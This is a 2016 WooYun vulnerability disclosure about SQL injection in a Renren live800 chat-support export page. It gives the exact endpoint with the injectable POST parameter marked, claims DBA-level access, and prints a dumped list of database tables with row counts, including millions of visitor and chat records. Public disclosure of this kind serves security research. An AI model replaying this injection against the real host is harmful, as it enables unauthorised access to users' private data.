人人网某处SQL注入影响大量数据

发表于 2016年6月23日
WooYun漏洞库
203 阅读
更新于 2019年4月8日 22:20:07 下午

漏洞概要

缺陷编号：WooYun-2016-0222273

漏洞标题：人人网某处SQL注入影响大量数据

漏洞详情

披露状态：

2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)export=txt&companyId=1&subStrSql=*

1	http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)export=txt&companyId=1&subStrSql=*

dba权限

Database: live800_im<br>
+---------------------+---------+<br>
| Table               | Entries |<br>
+---------------------+---------+<br>
| visitor_access      | 15081675 |<br>
| operator_status     | 633129  |<br>
| chat_topic          | 616252  |<br>
| live800_system      | 410676  |<br>
| chat_content        | 289363  |<br>
| chat_sta            | 289308  |<br>
| chat_info           | 285963  |<br>
| leaveword_topic     | 161506  |<br>
| trustful_visitor    | 78942   |<br>
| leaveword           | 74624   |<br>
| contact             | 71702   |<br>
| cookie_contact      | 71702   |<br>
| company_config_data | 69254   |<br>
| lost                | 51034   |<br>
| sync_info           | 23170   |<br>
| op_chat_content     | 7200    |<br>
| daily_flow_capacity | 1329    |<br>
| sys_operate_log     | 1266    |<br>
| faq                 | 115     |<br>
| operator            | 82      |<br>
| privilege           | 82      |<br>
| company_config      | 36      |<br>
| user_defined_button | 18      |<br>
| company_ui_config   | 16      |<br>
| config_template     | 12      |<br>
| user_invite         | 12      |<br>
| company_skill       | 11      |<br>
| ad_column           | 10      |<br>
| routing_action      | 6       |<br>
| chat_config         | 4       |<br>
| leaveword_box       | 3       |<br>
| notify              | 3       |<br>
| routing_condition   | 3       |<br>
| routing_policy      | 3       |<br>
| routing_rule        | 3       |<br>
| canned_url          | 1       |<br>
| company             | 1       |<br>
| company_style       | 1       |<br>
| customization       | 1       |<br>
| fuf                 | 1       |<br>
| ip_prohibit         | 1       |<br>
| operator_account    | 1       |<br>
+---------------------+---------+